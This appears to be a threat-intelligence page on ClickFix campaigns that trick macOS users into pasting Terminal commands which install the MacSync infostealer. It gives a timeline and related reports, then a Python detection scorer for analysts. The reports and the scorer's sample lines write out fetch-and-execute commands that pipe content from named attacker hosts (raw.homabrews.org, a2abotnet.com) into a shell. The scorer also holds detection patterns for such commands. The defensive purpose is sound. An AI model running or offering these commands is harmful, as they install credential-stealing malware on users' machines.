ClickFix Campaigns Deliver MacSync Infostealer to macOS Users
Researchers reported three ClickFix campaigns that used social engineering rather than software exploitation to infect macOS users with the MacSync infostealer. The activity evolved over several months, beginning with fake sponsored search results for an OpenAI Atlas browser download hosted on fraudulent pages, then shifting to malicious workflows that abused shared ChatGPT conversations and GitHub-themed landing pages to make the infection chain appear legitimate. In each case, victims were instructed to open Terminal and paste commands, allowing the malware to be installed through user action instead of a traditional exploit.
The most recent campaign introduced a more advanced MacSync variant with multi-stage loaders, dynamic AppleScript payloads, and in-memory execution intended to improve evasion and persistence. Reporting indicates the later activity targeted users in Belgium, India, and parts of North and South America, while researchers said it remains unclear whether all three campaigns were conducted by the same threat actor. The findings underscore a broader trend of attackers adapting ClickFix lures for macOS, using trusted platforms, sponsored links, and fake AI-tool installers to steal credentials and other sensitive data while bypassing file-based defenses by persuading users to execute the attack themselves.
Timeline
May 1, 2026
Lazarus uses Mach-O Man ClickFix lures to deploy macrasv2 on macOS
On May 1, 2026, SC Media reported that North Korea-linked Lazarus Group was targeting high-value fintech and cryptocurrency professionals on macOS with a ClickFix campaign using fake Teams, Zoom, and Google Meet pages. Victims were tricked into running Terminal commands that launched the Mach-O Man malware kit, which staged fake macOS apps, harvested credentials and host data, and deployed the macrasv2 stealer.
Apr 21, 2026
Netskope identifies ClickFix campaign targeting Asia finance-sector macOS users
On April 21, 2026, Netskope Threat Labs disclosed an active ClickFix campaign targeting macOS users in Asia’s finance sector with an AppleScript-based infostealer that also has Windows-targeting capability. The campaign uses fake CAPTCHA prompts and a pasted curl command to steal credentials, Keychain data, browser and wallet information, and forces victims to enter their macOS password through a deceptive Apple-like prompt.
Apr 3, 2026
Breakglass maps MacSync C2 APIs and exposes SOCKS5 proxy monetization
On April 3, 2026, Breakglass Intelligence reported a newly identified MacSync command-and-control server and documented 29 API endpoints exposing a mature malware-as-a-service platform. The analysis showed MacSync could convert infected Macs into rotating SOCKS5 residential proxies and noted that Apple Developer ID certificate GNJLS3UYZ4 was still valid and signing MacSync samples, helping them bypass Gatekeeper warnings.
Mar 25, 2026
Recorded Future links five ClickFix clusters to Windows and macOS malware delivery
On March 25, 2026, Recorded Future’s Insikt Group reported five distinct ClickFix activity clusters targeting Windows and macOS users through fake verification and brand-impersonation lures. The report said several clusters delivered NetSupport RAT, while a dual-platform/macOS cluster was assessed with high confidence to deliver the MacSync infostealer using a common four-stage execution chain.
Mar 19, 2026
CIS warns MacSync campaign is impacting U.S. SLTT macOS users
On March 19, 2026, CIS CTI reported an ongoing ClickFix-driven MacSync stealer campaign affecting macOS users in U.S. State, Local, Tribal, and Territorial government organizations. The activity used SEO poisoning and fake CAPTCHA pages to trick victims into running Terminal commands, extending known MacSync tradecraft into a newly identified government-sector victim set.
Mar 18, 2026
MacSync delivery expands via SEO poisoning and fake verification pages
By early 2026, a separate macOS campaign used SEO poisoning around searches for PDF books to redirect users to fake verification pages that prompted malicious Terminal execution. The staged infection chain delivered an AppleScript-based MacSync stealer that exfiltrated credentials, browser data, wallets, SSH keys, cloud configs, and documents.
Mar 17, 2026
Claude-themed ClickFix campaign targets developers with MacSync
By March 2026, a campaign dubbed Claude Fraud was using sponsored Google ads and fake Claude-related sites, including pages on claude.ai and Squarespace, to target developers and security professionals. On macOS, victims were induced to paste Terminal commands that installed MacSync, and the campaign was reported to have affected more than 15,600 victims overall.
Mar 16, 2026
Sophos discloses three MacSync ClickFix campaigns targeting macOS users
On March 16, 2026, Sophos publicly reported three distinct ClickFix campaigns observed from November 2025 through February 2026 that delivered the MacSync infostealer to macOS users. The disclosure highlighted a clear increase in attacker sophistication and the growing use of AI-themed and trusted-platform lures to steal credentials, files, keychain data, and cryptocurrency seed phrases.
Mar 12, 2026
Breakglass exposes BarkBlitz crypto-targeting MacSync campaign
On March 12, 2026, Breakglass Intelligence reported that the MacSync stealer, also tracked as BarkBlitz, had been active since at least November 2025 and was targeting cryptocurrency users through ClickFix-style fake Zoom, Trezor Suite, and Ledger lures. The report detailed recovered AppleScript payloads, three C2 domains, malware signed with a stolen Apple Developer ID, and a capability to backdoor Ledger Wallet and Ledger Live for later seed-phrase theft and transaction interception.
Feb 1, 2026
Latest ClickFix campaign adds GitHub-themed lures and in-memory execution
In February 2026, researchers observed the most advanced MacSync ClickFix campaign yet, using regionally targeted pages impersonating trusted platforms such as GitHub and multi-stage loaders. The updated MacSync variant added dynamic AppleScript payloads, in-memory execution, and tracking infrastructure to improve evasion and victim profiling.
Dec 1, 2025
MacSync campaign shifts to ChatGPT shared-conversation lures
By December 2025, attackers had evolved their macOS ClickFix activity to use malicious or weaponized ChatGPT shared conversation links and other AI-themed installation prompts. The campaign continued to rely on users manually executing Terminal commands rather than exploiting software flaws.
Dec 1, 2025
Jamf flags ClickFix lures distributing MacSync on macOS
In December 2025, Jamf Threat Labs identified ClickFix-style lures being used to distribute the MacSync infostealer to macOS users. This was an early public indication that pastejacking-style social engineering had expanded to MacSync delivery.
Nov 1, 2025
ClickFix campaign uses fake OpenAI Atlas browser lure to deliver MacSync
In November 2025, researchers observed a ClickFix campaign targeting macOS users through sponsored Google search results and a fake Google Sites page advertising a bogus OpenAI Atlas browser. Victims were tricked into pasting obfuscated Terminal commands that installed the MacSync infostealer.
Related Stories

ClickFix Social Engineering Drives Multi-Platform Malware Delivery
Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.
1 month ago
Microsoft Warns macOS Infostealer Campaigns Using ClickFix Lures, Malicious DMGs, and Python Stealers
Microsoft reported that **information-stealing malware activity is expanding from Windows to macOS**, driven by campaigns observed since late 2025 that rely on social engineering and cross-platform tooling. The activity includes **ClickFix-style prompts** and **malicious DMG installers** that deliver macOS-focused infostealer families such as **Atomic macOS Stealer (AMOS)**, **MacSync**, and **DigitStealer**, with operators leveraging **fileless execution**, **native macOS utilities**, and **AppleScript automation** to evade defenses and automate collection. Initial access commonly starts with **malicious search ads (e.g., Google Ads)** that redirect users to fake sites impersonating legitimate tools and then trick victims into running “fix” steps or installing trojanized software. The malware is assessed to target high-value data including browser credentials and session cookies, **iCloud Keychain** contents, crypto wallet data, and **developer secrets**; Microsoft also highlighted growing use of **Python-based stealers** distributed via phishing for rapid adaptation across heterogeneous environments, citing **PXA Stealer** (linked to Vietnamese-speaking actors) as an example used in late-2025 campaigns with persistence mechanisms such as registry `Run` keys or scheduled tasks and **Telegram** used for command-and-control.
1 month ago
ClickFix Campaign Abuses Claude Artifacts and Google Ads to Deliver macOS Infostealers
Threat actors are running a **ClickFix**-style social-engineering campaign that abuses **Google sponsored search results** to funnel macOS users to malicious content hosted on legitimate platforms, including **Anthropic Claude public artifacts** (`claude.ai`) and **Medium** pages impersonating trusted sources (e.g., Apple Support). The lures target common search queries such as “online DNS resolver,” “macOS CLI disk space analyzer,” and “HomeBrew,” then instruct victims to paste and run Terminal commands that decode/execute payloads (e.g., `echo "..." | base64 -D | zsh` or `curl ... | zsh`). Researchers (Moonlock Lab/MacPaw and AdGuard) reported that the malicious Claude artifact accumulated **~12,300 to 15,600 views**, indicating significant exposure (reported as **10,000+** and **15,000+** potential victims across coverage). The payloads deliver macOS information-stealing malware, including **MacSync**, which collects data such as **Keychain credentials, browser data, and cryptocurrency wallet files**. Reported tradecraft includes downloading and executing a shell script, using an AppleScript component for theft, staging stolen data into `/tmp/osalogging.zip`, and exfiltrating via HTTP POST to attacker infrastructure (e.g., `a2abotnet[.]com/gate`, with C2 paths like `a2abotnet[.]com/dynamic`). The malware attempts to blend in by spoofing legitimate macOS browser User-Agent strings and includes retry logic for large/chunked uploads, then removes staging artifacts to reduce forensic traces.
3 days ago
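The two related stories above describe the same execution primitives from the defender's side: a command pasted into Terminal that pipes remote content into `zsh`/`bash`, decodes an inline base64 blob into a shell, or fetches an "install" script from a look-alike host (`raw.homabrews.org` in place of `raw.githubusercontent.com`). The following scorer is an added example, not code from the page or from any of the vendors it cites. It ranks shell command lines, as they might appear in a macOS EDR process-execution feed or a user's shell history, by those patterns. The log lines are constructed; the watchlist contains only the two hosts named on this page (the defanged `a2abotnet[.]com` refanged), and the "expected host" mapping for Homebrew is an assumption made for the example.

```python
"""
Heuristic triage of ClickFix-style "paste this into Terminal" commands.

Added example (not from the page or any cited vendor report). Scores each
command line for execution primitives cited in the reporting above and for
contact with hosts the page names as attacker infrastructure.
"""
import re
from dataclasses import dataclass, field

# Hosts this page attributes to attacker infrastructure (refanged).
WATCHLIST_HOSTS = {"raw.homabrews.org", "a2abotnet.com"}

# Host a legitimate one-liner is expected to fetch from, keyed by the tool
# the lure impersonates. Assumption for this example, not a vendor list.
EXPECTED_HOSTS = {"homebrew": "raw.githubusercontent.com"}

# curl output piped straight into a shell:  curl ... | zsh
PIPE_TO_SHELL = re.compile(r"\bcurl\b[^|]*\|\s*(?:sudo\s+)?(?:z|ba)?sh\b")
# inline base64 decoded and executed:      echo "..." | base64 -D | zsh
B64_TO_SHELL = re.compile(r"base64\s+(?:-D|-d|--decode)\b[^|]*\|\s*(?:z|ba)?sh\b")
# command substitution handed to a shell:  bash -c "$(curl ...)"
CMDSUB_TO_SHELL = re.compile(r"\b(?:z|ba)?sh\b[^$]*-c\s*[\"']?\$\(\s*curl\b")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")


@dataclass
class Finding:
    line: str
    score: int = 0
    reasons: list = field(default_factory=list)


def hosts_in(cmd):
    """Return the set of lowercase hostnames referenced by URLs in cmd."""
    return {h.lower() for h in URL_HOST.findall(cmd)}


def score_command(cmd):
    """Score one command line; higher means more ClickFix-like."""
    f = Finding(line=cmd)
    if PIPE_TO_SHELL.search(cmd):
        f.score += 3
        f.reasons.append("remote content piped directly into a shell")
    if CMDSUB_TO_SHELL.search(cmd):
        f.score += 3
        f.reasons.append("curl output substituted into a shell -c argument")
    if B64_TO_SHELL.search(cmd):
        # An opaque inline payload is weighted above a readable remote script.
        f.score += 4
        f.reasons.append("base64-decoded inline payload executed by a shell")
    hosts = hosts_in(cmd)
    bad = hosts & WATCHLIST_HOSTS
    if bad:
        f.score += 5
        f.reasons.append("contacts watchlisted host(s): " + ", ".join(sorted(bad)))
    for keyword, expected in EXPECTED_HOSTS.items():
        if keyword in cmd.lower() and hosts and expected not in hosts:
            f.score += 4
            f.reasons.append(
                f"'{keyword}' command fetching from unexpected host(s): "
                + ", ".join(sorted(hosts))
            )
    return f


def triage(lines, threshold=4):
    """Return findings at or above threshold, highest score first.

    The default threshold lets a bare curl-to-shell from an expected host
    (score 3) pass, so the genuine Homebrew installer is not flagged while
    any look-alike host, watchlisted host or inline blob is.
    """
    found = [score_command(line) for line in lines]
    return sorted((f for f in found if f.score >= threshold),
                  key=lambda f: f.score, reverse=True)


# Constructed sample lines shaped like a zsh history / process-exec feed.
SAMPLE_LINES = [
    '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"',
    '/bin/bash -c "$(curl -fsSL https://raw.homabrews.org/Homebrew/install/HEAD/install.sh)"',
    'echo "aGVsbG8=" | base64 -D | zsh',
    'curl -s https://a2abotnet.com/dynamic | zsh',
    'ls -la /tmp',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f"[{f.score:2d}] {f.line}")
        for r in f.reasons:
            print(f"      - {r}")
```

Run against the samples, the look-alike Homebrew command scores highest because it trips the substitution primitive, the watchlist and the expected-host mismatch at once, while the genuine installer stays below the threshold. In production the watchlist would be fed from the C2 indicators in the underlying reports rather than hard-coded, and the scorer is a ranking aid for analysts, not a blocking control.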